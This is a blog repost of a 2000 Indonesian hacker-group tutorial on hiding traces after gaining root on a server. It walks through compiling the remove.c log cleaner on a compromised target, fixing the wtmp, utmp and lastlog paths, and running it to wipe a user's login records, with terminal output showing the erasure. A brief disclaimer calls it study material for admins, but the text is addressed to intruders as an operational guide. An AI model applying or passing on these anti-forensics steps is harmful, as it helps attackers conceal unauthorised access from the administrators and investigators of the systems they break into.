Select Page

iseng buka buka dokumentasi di hardisk eh ada yang menarik tuk di paste in disini ..

thx tuk Kecoak-elektronik πŸ˜‰ this article take from Kecoak-elektronik.net

—-

Terbitan Online Kecoak Elektronik
http://k-elektronik.org

============================================================
Bagaimana menghapus jejak
Script Kiddies Tutorial
(c) cbug aka CyberBug (Kecoak Elektronik)
============================================================

Pemberitahuan :
1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa
saja yang ingin mengembangkan pengetahuan networking/internet mereka.
2. Kecoak Elektronik tidak bertanggung jawab atas penyalah gunaan artikel
ini.
3. Kecoak Elektronik tetap menyertakan dan tidak menghapus Nama Penulis
eksploit/script dengan harapan pembaca juga tetap menyertakan kredit
untuk mereka, jangan mengganti nama2 penulis artikel/eksploit/script
dengan nama anda dengan harapan nanti dianggap hacker.

A. Apa yang harus ada

1. Server yang berhasil di root
Terserah mo pake apa, boljug pake contoh eksploit pada artikel saya
sebelumnya, pake remote eksploit juga boleh πŸ˜›

2. Program penghapus Log
Ada banyak dan bermacam-macam program penghapus log, pilih apa yang
menurut kamu bagus dan cocok buat kamu, untuk langkah awal kamu bisa
coba gunakan remove.c dari Simple Nomad.

B. Menghapus jejak

Nah … kamu sudah dapat akses root, asyiiik … tapi eh nanti dulu,
gimana kalo adminnya tau?, gak … dia gak bakalan tau, kalau kamu pake
program penghapus log untuk menghilangkan jejak kamu.
Caranya? … download remove.c dari site k-elektronik, kemudian compile
di mesin sasaran kamu, baca dulu baik2 cara compile nya di source remove.c
BTW … remove harus di running sebagai root (untuk latihan, bisa saja
kamu login root di mesin kamu sendiri).

a. Perlu diperhatikan bagian berikut ini :

#ifdef GENERIC /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP “/var/adm/wtmp”
#define UTMP “/var/adm/utmp”
#define LASTLOG “/var/adm/lastlog”
#endif

Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada
posisi yang sama, misalnya distro Slackware menaruh file2 tsb diatas di:
#define WTMP “/var/log/wtmp”
#define UTMP “/var/run/utmp”
#define LASTLOG “/var/log/lastlog”

Jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah
sesuai dengan source remove.c

Kamu bisa gunakan perintah :
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
atau
whereis wtmp
whereis utmp
whereis lastlog
Kemudian ganti posisi file2 tersebut di remove.c sesuai dengan hasil
diatas.

b. Kita compile sekarang? … ayooooooooooooo.

kecoak:/home/cbug/tools# gcc remove.c -o remove -DGENERIC
remove.c: In function `main’:
remove.c:50: warning: return type of `main’ is not `int’
/tmp/ccZVzySI.o: In function `main’:
/tmp/ccZVzySI.o(.text+0xb4): the `gets’ function is dangerous and should
not be used.

Waw … ada warning message … gak apa2, warning bukan error πŸ˜›

c. Cek last login nya user (cbug misalnya)

kecoak:/home/cbug/tools# lastlog | grep cbug
cbug tty2 Sat Mar 11 11:32:42 -0800 2000

d. Jalankan remove

kecoak:/home/cbug/tools# ./remove cbug

REMOVE by Simple Nomad
Nomad Mobile Research Centre (c) 1997

Found 549 record(s) for user cbug
Will attempt a lastlog cleanup by default.

# – remove last # records from utmp/wtmp
a – remove (a)ll records from utmp/wtmp
q – (q)uit program

Enter selection ->

e. Hapus record terakhir (ketik #), atau boleh juga semua (a) πŸ˜›

Enter selection -> #
REMOVE cleaned up 0 record(s) from /var/log/wtmp
REMOVE cleaned up 0 record(s) from /var/run/utmp
REMOVE cleaned up /var/log/lastlog

f. Cek last log nya cbug

kecoak:/home/cbug/tools# lastlog | grep cbug
cbug **Never logged in**

g. Ini hasilnya kalo cbug login :

Selamat datang di sarang Kecoak Elektronik

kecoak login: cbug
Password:
Kecoak’s K-Rad OS
No mail.

kecoak:~$

h. Biasanya kalo last log nya dicatat (belum/gak dihapus) cbug bisa liat
gini, (perhatikan bagian Last login nya) :

Selamat datang di sarang Kecoak Elektronik

kecoak login: cbug
Password:
Kecoak’s K-Rad OS
Last login: Sat Mar 11 12:06:02 -0800 2000 on tty3.
No mail.

kecoak:~$

i. Gitu aja


Manado, Awal Maret 2000
cbug

Shares
Share This